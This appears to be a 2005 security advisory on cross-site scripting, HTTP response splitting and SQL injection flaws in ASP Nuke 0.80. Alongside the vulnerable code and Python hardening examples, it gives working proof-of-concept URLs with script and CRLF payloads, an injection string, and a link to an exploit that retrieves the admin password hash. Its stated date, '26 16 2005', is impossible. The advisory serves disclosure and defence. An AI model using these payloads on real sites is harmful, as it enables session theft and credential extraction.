M4DR007-07SA.txt

Reported by Alberto Trivero, 29 Jun 2005. Type: packetstorm. Source: packetstormsecurity.com

Multiple vulnerabilities in ASP Nuke 0.80 related to Cross-Site Scripting, HTTP Response Splitting, and SQL Injection were published and released on 26 16 2005. The affected systems are those running version <= 0.80. The software is an open-source application for community-based websites with an extensible framework. The XSS vulnerability exists in the forgot_password and register pages, the HTTP Response Splitting vulnerability in the language_select page, and the SQL Injection in the comment_post page.

M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80

Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/

Software Description

***********

"ASP Nuke is an open-source software application for running a community-based web site on
a web server. By open-source, we mean the code is freely available for others to read, modify
and use in accordance with the software license. ASP Nuke is an extensible framework that
allows you to upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site operators to
re-organize the layout and navigation for their site."


Cross-Site Scripting (XSS)

***********

Let's look at the code from /module/account/register/forgot_password.asp at lines 33 and 103:
  
```asp
<?
...
' line 33: the value is taken straight from the request, with no validation
sEmail = steForm("Email")
...
<TR>
<TD class="forml">
<% steTxt "E-Mail" %> (req)<BR>
<!-- line 103: the same value is written into an attribute without HTML encoding -->
<INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22" MAXLENGTH="80" class="form">
</TD>
</TR>
<TR>
...
?>
```
  
As we can see, there is no control on the 'email' parameter when the page reads its value.
Since the parameter's value is written into the HTML page as is, an attacker can perform an XSS
attack with a URL like this:
  
http://www.example.com/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Along the same lines, other parameters of the register page are not properly sanitised either. These are some
PoC URLs:

http://www.example.com/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
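An added example, not from the advisory or from ASP Nuke: the attribute rendering of forgot_password.asp modelled in Python, once raw as the page shows it and once with HTML attribute encoding, then parsed the way a browser tokenises it so the difference is visible as tag structure rather than as a string. The function names, the parser class and the sample payload (the URL-decoded value of the PoC URL above) are this example's own.

```python
"""Added example, not ASP Nuke code: reflecting a form value into an HTML
attribute the way forgot_password.asp does (raw) and with attribute encoding,
then parsing the result to see what a browser would make of it.
render_raw, render_encoded and analyse are this example's own names."""

import html
from html.parser import HTMLParser

# Constructed sample input: the URL-decoded PoC value for the 'email' parameter.
POC_EMAIL = '"><script>alert(document.cookie)</script>'

TEMPLATE = '<INPUT TYPE="text" NAME="email" VALUE="%s" SIZE="22" MAXLENGTH="80" class="form">'


def render_raw(email):
    """Mirrors the vulnerable template: VALUE="<%= sEmail %>" with no encoding."""
    return TEMPLATE % email


def render_encoded(email):
    """Hardened form: HTML-encode the value, quotes included, before emitting it
    (the classic ASP equivalent is Server.HTMLEncode(sEmail))."""
    return TEMPLATE % html.escape(email, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag and the VALUE attribute of the first <input>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)  # HTMLParser lowercases tag and attribute names
        if tag == "input" and self.input_value is None:
            self.input_value = dict(attrs).get("value")


def analyse(markup):
    """Parse the rendered fragment and report how many <script> tags it contains
    and what value the input field actually ended up with."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return {"script_tags": parser.tags.count("script"),
            "input_value": parser.input_value}


if __name__ == "__main__":
    print("raw:    ", analyse(render_raw(POC_EMAIL)))
    print("encoded:", analyse(render_encoded(POC_EMAIL)))
```

In the raw rendering the payload closes the attribute and the tag, so the parser sees an empty input value followed by a real script element; in the encoded rendering there is no script element and the input value round-trips to exactly the string the user sent, which is the behaviour a fix needs to preserve.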
  
  
  
HTTP Response Splitting

***********

Let's look at the code from /module/support/language/language_select.asp at line 31:
  
```asp
<?
...
If steForm("action") = "go" Then
    ' make sure the required fields are present
    If Trim(steForm("LangCode")) = "" Then
        sErrorMsg = steGetText("Please select a language from the list below")
    Else
        ' redirect to the language administration
        ' line 31: LangCode is only checked for emptiness, so CR/LF inside it reaches the Location header
        Response.Redirect "tran_list.asp?langcode=" & steEncForm("LangCode")
    End If
End If
...
?>
```
  
When this code performs the redirect, a CRLF injection attack is possible because the value is
never sanitised. This is a PoC URL:

http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue
  
These are examples of HTTP headers:

Request:

```http
POST /module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: www.aspnuke.com
Content-Length: 90
Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
Connection: Close
```

Response:

```http
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sun, 15 May 2005 11:31:37 GMT
Pragma: no-cache
Location: tran_list.asp?langcode=trivero
Set-Cookie: some=value
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Expires: Sun, 15 May 2005 11:30:38 GMT
Cache-control: no-cache
```
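An added example, not from the advisory or from ASP Nuke: a Python model of how the Location header above is assembled, showing the injected Set-Cookie appearing as a separate header when the decoded LangCode value is concatenated in, and two defensive measures for the language_select.asp redirect: percent-encoding the value before it enters the header, and an allow-list check on the value. The function names and the LANGCODE_RE pattern are this example's own assumptions; the sample value is the LangCode parameter from the PoC URL.

```python
"""Added example, not ASP Nuke code: what happens to the response head when a
CR/LF pair inside the LangCode value reaches the Location header, and two
defensive measures for the redirect in language_select.asp: percent-encoding
before the value is placed in the header, and an allow-list check on the value.
All function names and the LANGCODE_RE pattern are this example's own assumptions."""

import re
from urllib.parse import quote, unquote

# Constructed sample: the LangCode value from the PoC URL as it arrives, still URL-encoded.
POC_LANGCODE = "trivero%0d%0aSet-Cookie%3Asome%3Dvalue"

STATUS_LINE = "HTTP/1.1 302 Object moved"


def build_redirect_raw(langcode_param):
    """Mirrors the vulnerable pattern: the decoded value is concatenated into the
    Location header and nothing stops CR/LF from ending that header early."""
    target = "tran_list.asp?langcode=" + unquote(langcode_param)
    return STATUS_LINE + "\r\nLocation: " + target + "\r\n\r\n"


def build_redirect_encoded(langcode_param):
    """Defence 1: re-encode the value for the query string, so CR, LF, ':' and '='
    become %0D, %0A, %3A and %3D and can no longer start a new header line."""
    target = "tran_list.asp?langcode=" + quote(unquote(langcode_param), safe="")
    return STATUS_LINE + "\r\nLocation: " + target + "\r\n\r\n"


# Assumed allow-list for a language code (the advisory's own request carries LANGUAGE=US).
LANGCODE_RE = re.compile(r"[A-Za-z]{2,5}")


def validated_langcode(langcode_param):
    """Defence 2: refuse anything that is not a plain language code. Control
    characters are checked first so the rejection reason is explicit in logs."""
    value = unquote(langcode_param)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in LangCode (possible CRLF injection)")
    if not LANGCODE_RE.fullmatch(value):
        raise ValueError("LangCode is not a language code: %r" % value)
    return value


def parse_head(head):
    """Split a response head the way a client does: status line, then one
    header per CRLF-terminated line, stopping at the empty line."""
    status, _, rest = head.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        if line == "":
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"status": status, "headers": headers}


if __name__ == "__main__":
    print("raw:    ", parse_head(build_redirect_raw(POC_LANGCODE))["headers"])
    print("encoded:", parse_head(build_redirect_encoded(POC_LANGCODE))["headers"])
```

The two defences are complementary: encoding keeps the header well-formed whatever the value is, while the allow-list turns an odd value into an error that can be logged and alerted on instead of silently redirecting.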
  
  
  
SQL Injection

***********

Let's look at the code from /module/support/task/comment_post.asp at lines 36 and 75:
  
```asp
<?
...
' line 36: TaskID is read from the request; nothing checks that it is numeric
nTaskID = steNForm("TaskID")
...
If sErrorMsg = "" Then
    ' prevent dup posting here
    ' line 75: the string fields get their quotes doubled, TaskID is concatenated as is
    sStat = "SELECT TaskID " & _
            "FROM tblTaskComment " & _
            "WHERE TaskID = " & nTaskID & " " & _
            "AND Subject = '" & Replace(sSubject, "'", "''") & "' " & _
            "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
...
?>
```
  
As we can see, there is no control on the 'TaskID' parameter when the page reads its value.
Since the parameter's value is put into the SQL query without sanitisation, an attacker
can perform an SQL injection attack. I've made an exploit for this vulnerability that is able
to recover the admin's username and the SHA256 hash of his password; it is available at this address:
http://albythebest.altervista.org/aspnuke.pl
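An added example, not from the advisory or from ASP Nuke: the duplicate-post query from comment_post.asp rebuilt in Python over an in-memory SQLite table, once by string concatenation exactly as the page shows it and once with an integer check on TaskID plus a parameterised statement. Table and column names follow the advisory; the sample rows and the function names are this example's own.

```python
"""Added example, not ASP Nuke code: the duplicate-post check from comment_post.asp
rebuilt over an in-memory SQLite table, once by string concatenation as the page
shows it and once with an integer check on TaskID plus a parameterised statement.
Table and column names follow the advisory; the rows and function names are this
example's own."""

import re
import sqlite3

# Constructed sample data standing in for tblTaskComment.
SAMPLE_ROWS = [
    (1, "hello", "first"),
    (2, "hello", "second"),
    (3, "other", "third"),
]


def make_db():
    """Create the table the query targets and load the sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tblTaskComment (TaskID INTEGER, Subject TEXT, Body TEXT)")
    con.executemany("INSERT INTO tblTaskComment VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def find_dup_concat(con, task_id, subject, body):
    """Mirrors the vulnerable statement: Subject and Body get their quotes doubled,
    TaskID is concatenated as received, so it can rewrite the WHERE clause."""
    stat = ("SELECT TaskID FROM tblTaskComment "
            "WHERE TaskID = " + task_id + " "
            "AND Subject = '" + subject.replace("'", "''") + "' "
            "AND Body LIKE '" + body.replace("'", "''") + "'")
    return [row[0] for row in con.execute(stat)]


def parse_task_id(raw):
    """The check the page says is missing: accept ASCII digits only, so the value
    can never be anything but a number (in VBScript a CLng() cast plays the same role)."""
    if not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("TaskID must be a non-negative integer, got %r" % raw)
    return int(raw)


def find_dup_param(con, raw_task_id, subject, body):
    """Hardened form: validated integer plus bound parameters, so no input can
    change the text of the statement."""
    stat = ("SELECT TaskID FROM tblTaskComment "
            "WHERE TaskID = ? AND Subject = ? AND Body LIKE ?")
    params = (parse_task_id(raw_task_id), subject, body)
    return [row[0] for row in con.execute(stat, params)]


if __name__ == "__main__":
    db = make_db()
    print("concat, honest input: ", find_dup_concat(db, "1", "hello", "first"))
    print("concat, altered TaskID:", find_dup_concat(db, "0 OR 1=1 --", "hello", "first"))
    print("param, honest input:   ", find_dup_param(db, "1", "hello", "first"))
```

The concatenated form returns every row once the TaskID value carries its own SQL, because the rest of the WHERE clause is commented away; the parameterised form either rejects the value outright or sends it to the database as data, and the Replace() on the string fields stays as defence in depth rather than being the only barrier.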
  
  
  
Solution

***********

The vendor has been contacted many times but a patch has not yet been produced.


Alberto Trivero - [email protected]
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group
